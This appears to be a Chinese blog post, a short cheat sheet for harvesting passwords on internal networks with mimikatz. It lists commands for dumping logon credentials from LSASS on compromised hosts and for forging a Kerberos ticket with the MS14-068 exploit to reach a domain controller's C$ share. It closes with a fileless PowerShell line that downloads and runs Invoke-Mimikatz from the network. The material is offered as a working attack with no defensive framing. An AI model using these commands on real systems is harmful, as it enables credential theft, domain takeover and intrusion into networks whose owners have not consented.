美文网首页
内网密码信息收集之mimikatz

内网密码信息收集之mimikatz

作者: q1ya | 来源:发表于2020-01-13 12:17 被阅读0次
    一、mimikatz结合procdump破解密码

    mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

    二、mimikatz直接在肉鸡上解密

    mimikatz.exe "privilege::debug" exit
    mimikatz.exe "sekurlsa::logonpasswords" exit

    三、mimikatz结合ms14-068拿域控(在域内肉鸡上执行)

    1、利用ms14-068生成cache(需要以获取域名称、域普通用户用户名、密码、域ip)
    MS14-068.exe -u zhangsan@DD11.com -s S-1-5-21-1120997190-3826596690-715383689-2222 -d 10.0.0.216 -p asd2xsaf2@!axas6N(此命令会生成一个cache文件)
    2、注入票据(在域内肉鸡执行)
    mimikatz.exe "kerberos::purge" exit //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
    mimikatz.exe "kerberos::list" exit //查看当前机器凭证
    mimikatz.exe "kerberos::ptc TGT_zhangsan@DD11.com.ccache" exit //将票据注入到内存中
    3、利用伪造好的票据登录域控服务器
    net use \\A-635ECAEE64804.TEST.LOCAL //此处填域的名称
    dir \\A-635ECAEE64804.TEST.LOCAL\c$

    四、通过powershell无文件加载mimikatz

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

    相关文章

      网友评论

          本文标题:内网密码信息收集之mimikatz

          本文链接:https://www.haomeiwen.com/subject/muvgactx.html